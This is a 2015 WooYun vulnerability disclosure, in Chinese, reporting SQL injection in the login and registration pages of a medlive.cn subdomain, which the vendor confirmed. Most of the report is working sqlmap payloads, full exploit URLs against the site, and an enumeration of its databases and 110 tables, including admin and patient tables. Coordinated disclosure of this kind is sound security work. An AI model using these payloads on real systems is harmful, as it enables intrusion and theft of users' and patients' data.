当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108545

漏洞标题:医脉通某站登陆和注册都存在SQL注射影响大量数据库

相关厂商:medlive.cn

漏洞作者: 路人甲

提交时间:2015-04-19 10:51

修复时间:2015-06-04 09:08

公开时间:2015-06-04 09:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-19: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经确认,细节仅向厂商公开
2015-04-30: 细节向核心白帽子及相关领域专家公开
2015-05-10: 细节向普通白帽子公开
2015-05-20: 细节向实习白帽子公开
2015-06-04: 细节向公众公开

简要描述:

23

详细说明:

get数据出去。太不安全了。

http://endop.medlive.cn/ac-usercenter/login.html?date=Fri%20Apr%2017%202015%2011:00:08%20GMT+0800%20(%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&submit_type=ajax&method=login&remmberme=0&username=23&password=23
http://endop.medlive.cn/ac-usercenter/register.html?method=checkexist&submit_type=ajax&type=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(120)%2cCHAR(56)%2cCHAR(73)%2cCHAR(80)%2cCHAR(72)%2cCHAR(104)%2cCHAR(113)%2cCHAR(113))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&value=e

漏洞证明:

登陆处 参数username

QQ图片20150417105800.png


注册处:参数type value

QQ图片20150417110130.png


---
Parameter: username (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: date=Fri Apr 17 2015 11:00:08 GMT 0800 (%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&submit_type=ajax&method=login&remmberme=0&username=23' RLIKE (SELECT (CASE WHEN (7770=7770) THEN 23 ELSE 0x28 END)) AND 'FtVh'='FtVh&password=23
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: date=Fri Apr 17 2015 11:00:08 GMT 0800 (%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&submit_type=ajax&method=login&remmberme=0&username=23' AND (SELECT 7910 FROM(SELECT COUNT(*),CONCAT(0x71767a7871,(SELECT (ELT(7910=7910,1))),0x7170627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xjTj'='xjTj&password=23
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: date=Fri Apr 17 2015 11:00:08 GMT 0800 (%E4%B8%AD%E5%9B%BD%E6%A0%87%E5%87%86%E6%97%B6%E9%97%B4)&submit_type=ajax&method=login&remmberme=0&username=23' AND (SELECT * FROM (SELECT(SLEEP(5)))vfAJ) AND 'VrTy'='VrTy&password=23
---
web application technology: Apache 2.2.14
back-end DBMS: MySQL 5.0
available databases [3]:
[*] endu
[*] endu_patient
[*] information_schema
Database: endu
[110 tables]
+--------------------------+
| cms_admin                |
| cms_admin_role           |
| cms_admin_role_priv      |
| cms_ads_1109             |
| cms_ads_1110             |
| cms_area                 |
| cms_attachment           |
| cms_author               |
| cms_block                |
| cms_c_activity           |
| cms_c_case               |
| cms_c_experts            |
| cms_c_ku6video           |
| cms_c_patients           |
| cms_c_read               |
| cms_c_wenxian            |
| cms_c_zhuanqu            |
| cms_cache_count          |
| cms_category             |
| cms_collect              |
| cms_content              |
| cms_content_count        |
| cms_content_position     |
| cms_content_tag          |
| cms_copyfrom             |
| cms_datasource           |
| cms_editor_data          |
| cms_endu_baidu           |
| cms_endu_mycomments      |
| cms_endu_myconsult       |
| cms_endu_mydownload      |
| cms_endu_mypolls         |
| cms_endu_mytopics        |
| cms_endu_qq              |
| cms_endu_qq_session      |
| cms_endu_renren          |
| cms_endu_sina            |
| cms_error_report         |
| cms_hits                 |
| cms_ipbanned             |
| cms_keylink              |
| cms_keyword              |
| cms_linkage              |
| cms_log                  |
| cms_member               |
| cms_member_cache         |
| cms_member_casedoc       |
| cms_member_company       |
| cms_member_detail        |
| cms_member_doctor        |
| cms_member_expert        |
| cms_member_group         |
| cms_member_group_extend  |
| cms_member_group_priv    |
| cms_member_info          |
| cms_member_oa            |
| cms_menu                 |
| cms_model                |
| cms_model_field          |
| cms_module               |
| cms_player               |
| cms_position             |
| cms_process              |
| cms_process_status       |
| cms_role                 |
| cms_search               |
| cms_search_type          |
| cms_session              |
| cms_space                |
| cms_space_api            |
| cms_status               |
| cms_times                |
| cms_type                 |
| cms_urlrule              |
| cms_video                |
| cms_video_count          |
| cms_video_data           |
| cms_video_position       |
| cms_video_special        |
| cms_video_special_list   |
| cms_video_tag            |
| cms_vote_useroption      |
| cms_workflow             |
| download_file_count      |
| group_category           |
| group_forum              |
| group_info               |
| group_info_ext_category  |
| group_join_queue         |
| group_member             |
| group_private_topic      |
| group_private_topic_post |
| group_topic              |
| group_topic_copy         |
| group_topic_post         |
| group_topic_post_copy    |
| upload_file              |
| v_list_activity          |
| v_list_case              |
| v_list_experts           |
| v_list_group             |
| v_list_patients          |
| v_list_read              |
| v_list_zhuanqu           |
| v_show_case              |
| v_show_experts           |
| v_show_patients          |
| v_show_read              |
| v_show_zhuanqu           |
| v_user_info              |
+--------------------------+

修复方案:

紧急修复!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-20 09:07

厂商回复:

我们紧急修复中

最新状态:

暂无